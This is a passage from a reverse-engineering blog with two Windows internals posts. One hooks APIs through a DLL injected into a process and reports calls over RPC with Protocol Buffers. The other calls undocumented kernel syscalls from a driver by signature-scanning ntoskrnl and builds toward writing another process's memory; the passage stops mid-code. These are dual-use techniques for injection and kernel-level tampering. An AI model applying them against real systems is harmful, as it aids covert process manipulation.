RCE Endeavors 😅

June 10, 2014

Monitoring APIs with RPC and Protocol Buffers

Filed under: General x86,General x86-64,Programming — admin @ 11:48 PM

This post will discuss API monitoring in a remote process through RPCs (via sockets) and Google’s Protocol Buffers encoding/message interchange format. The purpose is to use the example as a building block for a generic API monitoring client-server application, with the server being resident inside of a DLL that is injected into a remote process. Clients can connect and send messages to install/remove hooks and receive updates from the server when these desired APIs are called by the target application. In summary, the system will interact as follows:

  • A process that is the target of monitoring will be running on the system.
  • A DLL is injected into this process and a server socket is created and begins listening.
  • A separate client application will connect on the server port and begin issuing commands to the server to add/remove hooks.
  • The server will receive these commands and inform the client when the desired API is hit. The parameters will be passed back to the client and the server will wait for a response from the client to continue execution in order for the client to properly process the returned parameters.

Below is the example protocol that these components will interact through

package ApiMonitor.ProtoBuf;

message Call
{
    required uint32 uiHookId = 1;
    
    repeated uint64 uiParameter = 2;
}

message AddHook
{
    required uint32 uiHookId = 1;
    
    required string strDllName = 2;
    required string strFunctionName = 3;
    required uint32 uiNumParameters = 4;
}

message RemoveHook
{
    required uint32 uiHookId = 1;
}

message MonitorMessage
{
    optional AddHook mAddHook = 1;
    optional RemoveHook mRemoveHook = 2;
    
    optional Call mCall = 3;
    
    optional bool bIsContinue = 4;
}

Client/Server components will receive a MonitorMessage, which can contain an add hook message, remove hook message, call information message, or a boolean indicating that it is a continue message from the client. The server will operate on AddHook/RemoveHook by performing the appropriate actions, and will generate Call mesages containing the values of the parameters as they are retrieved from the stack as part of the added API hook. The client will generate AddHook/RemoveHook messages, or send a continue message to the server by sending a message with bIsContinue as true. The client will additionally operate on received Call messages from the server and, for this example, display the parameters of the hooked function. Special identifiers (uiHookId) will identify individual hooks for easy removal or dispatching of received call messages. The example code I provide only shows one hooked function, but the idea allows for it to be extended to any arbitrary number.

Adding a hook becomes pretty straightforward. From the client code:

ApiMonitor::ProtoBuf::MonitorMessage mOutgoingMessage;
mOutgoingMessage.mutable_maddhook()->set_uihookid(0x123);
mOutgoingMessage.mutable_maddhook()->set_strdllname("user32.dll", 10);
mOutgoingMessage.mutable_maddhook()->set_strfunctionname("MessageBoxA", 11);
mOutgoingMessage.mutable_maddhook()->set_uinumparameters(4);
(void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);

with SendOutgoingMessage being responsible for serialization of the Protocol Buffer message. The message are sent in two parts, with the first containing the size of the incoming message buffer and the latter containing the bytes of the message itself. This functionality is used both in client and server.

const bool Send(SOCKET sckConnect, const char *pBuffer, int uiBufferLength)
{
    int iResult = send(sckConnect, (const char *)pBuffer, uiBufferLength, 0);
    if (iResult == SOCKET_ERROR)
    {
        printf("send failed. Error = %X\n", WSAGetLastError());
        closesocket(sckConnect);
        WSACleanup();
        return false;
    }
 
    return true;
}
 
const bool SendOutgoingMessage(SOCKET sckConnect, ApiMonitor::ProtoBuf::MonitorMessage *pMessage)
{
    const int iBuffSize = pMessage->ByteSize();
 
    char *pBuffer = (char *)malloc(iBuffSize * sizeof(char));
    pMessage->SerializePartialToArray(pBuffer, iBuffSize);
 
    bool bRet = Send(sckConnect, (const char *)&iBuffSize, sizeof(int));
    bRet &= Send(sckConnect, pBuffer, iBuffSize);
 
    free(pBuffer);
 
    return bRet;
}

On the server receiving end, the messages are read from the socket and the MonitorMessage is reconstructed. The fields are checked and the appropriate dispatch happens.

int iResult = 0;
do
{
    int iBuffSize = 0;
    iResult = recv(sckClient, (char *)&iBuffSize, sizeof(int), 0);
    char *pBuffer = (char *)malloc(iBuffSize * sizeof(char));
    iResult = recv(sckClient, pBuffer, iBuffSize, 0);
 
    ApiMonitor::ProtoBuf::MonitorMessage mReceivedMessage;
    mReceivedMessage.ParseFromArray(pBuffer, iBuffSize);
    if (mReceivedMessage.has_biscontinue())
    {
        SetEvent(hWaitEvent);
    }
    else if (mReceivedMessage.has_maddhook())
    {
        (void)AddHook(mReceivedMessage.maddhook().uihookid(),
            mReceivedMessage.maddhook().strdllname().c_str(),
            mReceivedMessage.maddhook().strfunctionname().c_str(),
            mReceivedMessage.maddhook().uinumparameters(), &dwAddress);
    }
    else if (mReceivedMessage.has_mremovehook())
    {
        (void)RemoveHook(mReceivedMessage.mremovehook().uihookid(), dwAddress);
    }
 
    free(pBuffer);
} while (iResult > 0);

If the message is a continue message then an event is signaled to allow the thread that invoked the target API to continue (this will be discussed further in a bit). Otherwise if the message is an add or remove hook message, the appropriate actions to add/remove it will be taken. The code for this won’t be shown here because the technique has been discussed several times before (see memory breakpoints or the previous usage of them). Additionally, the full source code for all of this is provided. Once the hook is installed and the target API is hit, it will trampoline to a hook function which will retrieve the parameters from the current execution context. The implementation is shown below

static void WINAPI HookFunction(CONTEXT *pContext)
{
    EnterCriticalSection(&critSec);
 
    ApiMonitor::ProtoBuf::MonitorMessage mCallMessage;
#ifdef _M_IX86
    for(DWORD_PTR i = 0; i < dwHookNumParameters; ++i)
    {
        DWORD_PTR dwParameter = *(DWORD_PTR *)(pContext->Esp + sizeof(DWORD_PTR) + (i * sizeof(DWORD_PTR)));
        mCallMessage.mutable_mcall()->add_uiparameter(dwParameter);
    }
#elif defined _M_AMD64
        mCallMessage.mutable_mcall()->add_uiparameter(pContext->Rcx);
        mCallMessage.mutable_mcall()->add_uiparameter(pContext->Rdx);
        mCallMessage.mutable_mcall()->add_uiparameter(pContext->R8);
        mCallMessage.mutable_mcall()->add_uiparameter(pContext->R9);
#else
#error "Unsupported platform"
#endif
    mCallMessage.mutable_mcall()->set_uihookid(dwHookId);
 
    SendOutgoingMessage(sckOutgoing, &mCallMessage);
 
    WaitForSingleObject(hWaitEvent, INFINITE);
 
    LeaveCriticalSection(&critSec);
}

For x86, the parameters are retrieved directly from the stack. For x64, the four parameters are retrieved from registers as per the x64 ABI on Windows. If more parameters were to be retrieved for x64, there would have to be an additional field to specify the stack offset at which they start. The example keeps it simple and uses an API (MessageBoxA) with only four parameters. These values are added to a Call message and sent out back to the client. The thread then halts execution waiting for an event to be signaled. This is the event that is signaled via SetEvent(hWaitEvent); on the listening thread.
Going back to the client, the code for handling this Call message is shown below:

do
{
    ApiMonitor::ProtoBuf::MonitorMessage mIncomingMessage = ReceiveIncomingMessage(sckConnect);
    assert(mIncomingMessage.mcall().uihookid() == 0x123);
 
    HWND hWnd = (HWND)mIncomingMessage.mcall().uiparameter(0);
    DWORD_PTR dwTextAddress = (DWORD_PTR)mIncomingMessage.mcall().uiparameter(1);
    DWORD_PTR dwCaptionAddress = (DWORD_PTR)mIncomingMessage.mcall().uiparameter(2);
    UINT uiType = (UINT)mIncomingMessage.mcall().uiparameter(3);
    LPSTR lpTextBuffer[64] = { 0 };
    LPSTR lpTitleBuffer[64] = { 0 };
 
    DWORD dwProcessId = atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, dwProcessId);
    SIZE_T dwBytesRead = 0;
    (void)ReadProcessMemory(hProcess, (LPCVOID)dwTextAddress, lpTextBuffer, sizeof(lpTextBuffer), &dwBytesRead);
    (void)ReadProcessMemory(hProcess, (LPCVOID)dwCaptionAddress, lpTitleBuffer, sizeof(lpTitleBuffer), &dwBytesRead);
 
    printf("Parameters\n"
        "HWND: %X\n"
        "Text: %s\n"
        "Title: %s\n"
        "Type: %X\n",
        hWnd, lpTextBuffer, lpTitleBuffer, uiType);
 
    mOutgoingMessage.Clear();
    mOutgoingMessage.set_biscontinue(true);
    (void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);
} while (!GetAsyncKeyState(VK_F12));

The parameters are retrieved from the message. Two of these parameters are addresses, specifically the MessageBox text and caption. These need to be read from the process memory and are done via a ReadProcessMemory call. After these are retrieved and output, the client creates a Continue message and sends it back to the server to continue execution there. After monitoring is finished (via an F12 key press), the client sends a remove hook message with the following:

mOutgoingMessage.Clear();
mOutgoingMessage.mutable_mremovehook()->set_uihookid(0x123);
(void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);

which removes the hook from the target process.

Taking a look at it in action, an example application which repeatedly calls MessageBoxA via

MessageBoxA(NULL, "Hello, World!", "Test", MB_ICONINFORMATION);

is available. Below is a screenshot of the client after the server DLL was injected into this process.rpchookThe full source code relating to this can be found here. The static libraries were compiled with VS 2013 and will need to be recompiled if other compilers are used.

December 6, 2013

Calling Undocumented APIs in the Windows Kernel

Filed under: General x86,General x86-64,Reverse Engineering — admin @ 7:51 PM

Background

This post takes a different approach from the others and delves into the world of the Windows kernel. Specifically, it will cover how to access the undocumented APIs that are present within the kernel (ntoskrnl). If you trace a Windows API call from usermode to the kernel, you will find the endpoint to be something similar to what is shown below (Win 8 x64):

public NtOpenFile
NtOpenFile proc near
4C 8B D1                           mov r10, rcx
B8 31 00 00 00                     mov eax, 31h
0F 05                              syscall
C3                                 retn
NtOpenFile endp

where the r10 register holds the value of the first argument and eax holds the index into the Windows internal syscall table. A note should be made that this is specific to a x64 operating system running a native x64 application. x86 systems rely on going through KiFastSystemCall in ntdll to achieve invoking a syscall, and WOW64 emulation relies on making transitions from x64 to x86 and back and setting up an appropriate stack in-between. When the syscall instruction executes, the flow of code will eventually find itself to NtOpenFile in ntoskrnl. This is actually a wrapper around IopCreateFile (shown below):

public NtOpenFile
NtOpenFile proc near
4C 8B DC                            mov     r11, rsp
48 81 EC 88 00 00 00                sub     rsp, 88h
8B 84 24 B8 00 00 00                mov     eax, [rsp+88h+arg_28]
45 33 D2                            xor     r10d, r10d
4D 89 53 F0                         mov     [r11-10h], r10
C7 44 24 70 20 00 00 00             mov     [rsp+88h+var_18], 20h
45 89 53 E0                         mov     [r11-20h], r10d
4D 89 53 D8                         mov     [r11-28h], r10
45 89 53 D0                         mov     [r11-30h], r10d
45 89 53 C8                         mov     [r11-38h], r10d
4D 89 53 C0                         mov     [r11-40h], r10
89 44 24 40                         mov     [rsp+88h+var_48], eax
8B 84 24 B0 00 00 00                mov     eax, [rsp+88h+arg_20]
C7 44 24 38 01 00 00 00             mov     [rsp+88h+var_50], 1
89 44 24 30                         mov     [rsp+88h+var_58], eax
45 89 53 A0                         mov     [r11-60h], r10d
4D 89 53 98                         mov     [r11-68h], r10
E8 48 E2 FC FF                      call    IopCreateFile
48 81 C4 88 00 00 00                add     rsp, 88h
C3                                  retn
NtOpenFile endp

Again it should be noted that there was a lot of hand-waving going on here, and that the syscall instruction does not simply invoke the native kernel API, but goes through several routines responsible for setting up trap frames and performing access checks before arriving at the native API implementation.
Exported native kernel APIs for use in drivers also follow a similar, but nowhere near as complex mechanism. Every Zw* function in the kernel provides a thin wrapper around a call to the Nt* version (example shown below):

NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PIO_STATUS_BLOCK IoStatusBlock,
    ULONG ShareAccess,
    ULONG OpenOptions)
ZwOpenFile proc near
48 8B C4                            mov     rax, rsp
FA                                  cli
48 83 EC 10                         sub     rsp, 10h
50                                  push    rax
9C                                  pushfq
6A 10                               push    10h
48 8D 05 BD 2F 00 00                lea     rax, KiServiceLinkage
50                                  push    rax
B8 31 00 00 00                      mov     eax, 31h
E9 C2 DA FF FF                      jmp KiServiceInternal
ZwOpenFile endp

This wrapper does basic things such as set up the stack, disable kernel interrupts (cli), and preserve flags. The KiServiceLinkage function is just a small stub that executes the ret instruction immediately. I have not had a chance to reverse it to see what purpose it serves — it was never even invoked when a breakpoint was set on it. Lastly, the syscall number (0x31) is put into eax and a jump to the KiServiceInternal routine is made. This routine, among other things, is responsible for setting the correct PreviousMode and traversing the Windows syscall table (commonly referred to as the System Service Dispatch Table, or SSDT) and invoking the native Nt* version of the API.

Getting Access to the APIs
So what is the relevance of all of this? The answer is that even though the kernel exports a ton of APIs for kernel/driver developers, there are still plenty of other ones which provide some pretty cool functionality — ones like ZwSuspendProcess/ZwResumeProcess, ZwReadVirtualMemory/ZwWriteVirtualMemory, etc, that are not available. Getting access to those APIs is really where this post begins. Before starting, there are several clear issues that need to be resolved:

  • The base address and image size in memory of the kernel (ntoskrnl) need to be found. This is obviously because the APIs lay somewhere within that memory region.
  • The syscalls need to be identified and there should be a generic way developed to allow us to invoke them.
  • Other issues related to using the APIs should be addressed. For example, process enumeration in the kernel in order to get a valid process handle for the target process in a ZwSuspend/ZwResume call.

Addressing these in order, the first point is relatively simple, but also relies on undocumented features. Getting the address of the kernel in memory is as simple as calling ZwQuerySystemInformation with the undocumented SYSTEM_INFORMATION_CLASS structure. What will be returned is a pointer to a SYSTEM_MODULE_INFORMATION structure containing a count of loaded modules in memory followed by the variable length array of SYSTEM_MODULE pointers. A quick note to add is that the NtInternals documentation on the structure is a bit outdated, and that the first two fields are of type ULONG_PTR instead of always a 32-bit ULONG. Finding the kernel base address and image size is simple a traversal of the SYSTEM_MODULE array and a substring search for the kernel name. The code is shown below:

PSYSTEM_MODULE GetKernelModuleInfo(VOID) {
 
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //For names for WinXP
    CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" };
 
    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);
 
    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i) {         
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) {             
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
             }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    return NULL;
}

The above function will return the PSYSTEM_MODULE corresponding to information about the kernel (or NULL in the failure case). Now that the base address and image size of the kernel are known, it is possible to begin coming up with a way to invoke the undocumented syscalls.
Since all of the undocumented Zw* calls are nearly identical wrappers (with the exception of the syscall number) invoking KiSystemService, I present the generic way of invoking these calls by creating a functionality equivalent template of this in kernel memory and executing off of that. The general idea is to create a blank template such as the one shown below:

BYTE NullStub = 0xC3;
 
BYTE SyscallTemplate[] = {
    0x48, 0x8B, 0xC4,                                           /*mov rax, rsp*/
    0xFA,                                                       /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                     /*sub rsp, 0x10*/
    0x50,                                                       /*push rax*/
    0x9C,                                                       /*pushfq*/
    0x6A, 0x10,                                                 /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/
    0x50,                                                       /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,				/*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                               /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,             /*mov [rsp+0x4], HighBytes*/
    0xC3							/*ret*/
};

in non paged memory, patch in the correct addresses (NullStub replacing KiServiceLinkage), patch in the syscall, then invoke KiSystemService (here done by moving the 64-bit absolute address on the stack and returning to it). Once fully patched at runtime, this data can simply be cased to the appropriate function pointer and invoked like normal. Here is the allocation and patching routine:

PVOID CreateSyscallWrapper(IN LONG Index) {
 
    PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate));
    BYTE *NullStubAddress = &NullStub;
    BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE));
    BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE));
    BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE));
    BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE));
    ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF;
    ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32);
    RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate));
    RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *));
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG));
    RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG));
    return Buffer;
}

Example usage of this is again shown below:

typedef NTSTATUS (NTAPI *pZwSuspendProcess)(IN HANDLE ProcessHandle);
pZwSuspendProcess ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1);
//This can then be invoked as normal, e.g, ZwSuspendProcess(x);

However, before doing that, the address of KiServiceInternal needs to be found so it can be properly patched in. This is, after all, partially why finding the base address of the kernel was important. This is done through scanning for the function signature through the entirely of ntoskrnl’s memory. The signature must be sufficiently long as to be unique, but preferably not so long that comparisons take a lot of time. The signature that I used for this example is shown below:

typedef VOID (*pKiSystemService)(VOID);
pKiSystemService KiSystemService;
 
NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) {
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };
    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature,
        sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
        if(KiSystemService == NULL) {
            DbgPrint("- Could not find KiSystemService\n");
            return STATUS_UNSUCCESSFUL;
        }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);
    //....
}
 
...
...
 
PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize,
    IN PVOID KernelBaseAddress, IN ULONG ImageSize) {
 
    BYTE *CurrentAddress = 0;
    ULONG i = 0;
 
    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
 
    for(i = 0; i < ImageSize; ++i) {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
    ++CurrentAddress;
    }
return NULL;
}

Once the ResolveFunctions() function executes, the CreateSyscallWrapper function is ready to be used as shown above. This will now resolve any syscall that you wish to call.

An Example

The code below is an example I wrote up showing how to write into the virtual address space of a target process. This process is given by name to the OpenProcess function, which retrieves the appropriate EPROCESS block corresponding to the process and opens a handle to it. This handle is then used in conjunction with the undocumented APIs associated with process manipulation (ZwSuspendProcess/ZwResumeProcess) and virtual memory manipulation (ZwProtectVirtualMemory/ZwWriteVirtualMemory). An internal undocumented function (PsGetNextProcess) is also scanned for and retrieved in order to help facilitate process enumeration. The code was written for and tested on an x86 version of Windows XP SP3 and x64 Windows 7 SP1.

#include "stdafx.h"
 
#include "Undocumented.h"
#include <wdm.h>
 
#ifdef __cplusplus
extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING  RegistryPath);
#endif
 
pPsGetProcessImageFileName PsGetProcessImageFileName;
pPsGetProcessSectionBaseAddress PsGetProcessSectionBaseAddress;
pPsGetNextProcess PsGetNextProcess;
pZwSuspendProcess ZwSuspendProcess;
pZwResumeProcess ZwResumeProcess;
pZwProtectVirtualMemory ZwProtectVirtualMemory;
pZwWriteVirtualMemory ZwWriteVirtualMemory;
pKiSystemService KiSystemService;
 
#ifdef _M_IX86
__declspec(naked) VOID SyscallTemplate(VOID) {
    __asm {
    /*B8 XX XX XX XX   */ mov eax, 0xC0DE
    /*8D 54 24 04      */ lea edx, [esp + 0x4]
    /*9C               */ pushfd
    /*6A 08            */ push 0x8
    /*FF 15 XX XX XX XX*/ call KiSystemService
    /*C2 XX XX         */ retn 0xBBBB
    }
}
#elif defined(_M_AMD64)
 
BYTE NullStub = 0xC3;
 
BYTE SyscallTemplate[] =
{
    0x48, 0x8B, 0xC4,                                           /*mov rax, rsp*/
    0xFA,                                                       /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                     /*sub rsp, 0x10*/
    0x50,                                                       /*push rax*/
    0x9C,                                                       /*pushfq*/
    0x6A, 0x10,                                                 /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/
    0x50,                                                       /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,                               /*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                               /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,             /*mov [rsp+0x4], HighBytes*/
    0xC3                                                        /*ret*/
};
#endif
 
PVOID FindFunctionInModule(IN CONST BYTE *Signature,
    IN ULONG SignatureSize,
    IN PVOID KernelBaseAddress,
    IN ULONG ImageSize) {
 
    BYTE *CurrentAddress = 0;
    ULONG i = 0;
 
    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
 
    for(i = 0; i < ImageSize; ++i) {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
    ++CurrentAddress;
    }
    return NULL;
}
 
NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) {
 
    UNICODE_STRING PsGetProcessImageFileNameStr = {0};
    UNICODE_STRING PsGetProcessSectionBaseAddressStr = {0};
#ifdef _M_IX86
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x51, 0x83, 0x65,
        0xFC, 0x00, 0x56, 0x57, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00,
        0x8B, 0xF0, 0xFF, 0x8E, 0xD4, 0x00, 0x00, 0x00, 0xB9, 0xC0,
        0x38, 0x56, 0x80, 0xE8, 0xB4, 0xEE, 0xF6, 0xFF, 0x8B, 0x45,
        0x08, 0x85, 0xC0
    };
#elif defined(_M_AMD64)
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10,
        0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x54, 0x41, 0x55,
        0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x65, 0x48,
        0x8B, 0x34, 0x25, 0x88, 0x01, 0x00, 0x00, 0x45, 0x33, 0xED,
        0x48, 0x8B, 0xF9, 0x66, 0xFF, 0x8E, 0xC6, 0x01, 0x00, 0x00,
        0x4D, 0x8B, 0xE5, 0x41, 0x8B, 0xED, 0x41, 0x8D, 0x4D, 0x11,
        0x33, 0xC0,
    };
#endif
#ifdef _M_IX86
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x6A, 0x00, 0x55, 0x53, 0x56, 0x57, 0x0F, 0xA0, 0xBB, 0x30,
        0x00, 0x00, 0x00, 0x66, 0x8E, 0xE3, 0x64, 0xFF, 0x35, 0x00,
        0x00, 0x00, 0x00
    };
#elif defined(_M_AMD64)
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };
#endif
    RtlInitUnicodeString(&PsGetProcessImageFileNameStr, L"PsGetProcessImageFileName");
    RtlInitUnicodeString(&PsGetProcessSectionBaseAddressStr, L"PsGetProcessSectionBaseAddress");
 
    PsGetProcessImageFileName = (pPsGetProcessImageFileName)MmGetSystemRoutineAddress(&PsGetProcessImageFileNameStr);
    if(PsGetProcessImageFileName == NULL) {
        DbgPrint("- Could not find PsGetProcessImageFileName\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessImageFileName at %p\n", PsGetProcessImageFileName);
 
    PsGetProcessSectionBaseAddress = (pPsGetProcessSectionBaseAddress)MmGetSystemRoutineAddress(&PsGetProcessSectionBaseAddressStr);
    if(PsGetProcessSectionBaseAddress == NULL) {
        DbgPrint("- Could not find PsGetProcessSectionBaseAddress\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessSectionBaseAddress at %p\n", PsGetProcessSectionBaseAddress);
 
    PsGetNextProcess = (pPsGetNextProcess)FindFunctionInModule(PsGetNextProcessSignature,
        sizeof(PsGetNextProcessSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(PsGetNextProcess == NULL) {
        DbgPrint("- Could not find PsGetNextProcess\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetNextProcess at %p\n", PsGetNextProcess);
 
    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature,
        sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(KiSystemService == NULL) {
        DbgPrint("- Could not find KiSystemService\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);
 
    return STATUS_SUCCESS;
}
 
VOID OnUnload(IN PDRIVER_OBJECT DriverObject) {
 
    DbgPrint("+ Unloading\n");
}
 
PSYSTEM_MODULE GetKernelModuleInfo(VOID) {
 
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //Other names for WinXP
    CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" };
 
    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);
 
    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i) {
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) {
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
            }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    return NULL;
}
 
PEPROCESS GetEPROCESSFromName(IN CONST CHAR *ImageName) {
 
    PEPROCESS ProcessHead = PsGetNextProcess(NULL);
    PEPROCESS Process = PsGetNextProcess(NULL);
    CHAR *ProcessName = NULL;
 
    do {
        ProcessName = PsGetProcessImageFileName(Process);
        DbgPrint("+ Currently looking at %s\n", ProcessName);
        if(strstr(ProcessName, ImageName) != NULL) {
            DbgPrint("+ Found the process -- %s\n", ProcessName);
            return Process;
        }
        Process = PsGetNextProcess(Process);
    } while(Process != NULL && Process != ProcessHead);
    DbgPrint("- Could not find %s\n", ProcessName);
    return NULL;
}
 
HANDLE GetProcessIdFromEPROCESS(PEPROCESS Process) {
 
    return PsGetProcessId(Process);
}
 
HANDLE OpenProcess(IN CONST CHAR *ProcessName, OUT OPTIONAL PEPROCESS *pProcess) {
 
    HANDLE ProcessHandle = NULL;
    CLIENT_ID ClientId = {0};
    OBJECT_ATTRIBUTES ObjAttributes = {0};
    PEPROCESS EProcess = GetEPROCESSFromName(ProcessName);
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
 
    if(EProcess == NULL) {
        return NULL;
    }
    InitializeObjectAttributes(&ObjAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    ObjAttributes.ObjectName = NULL;
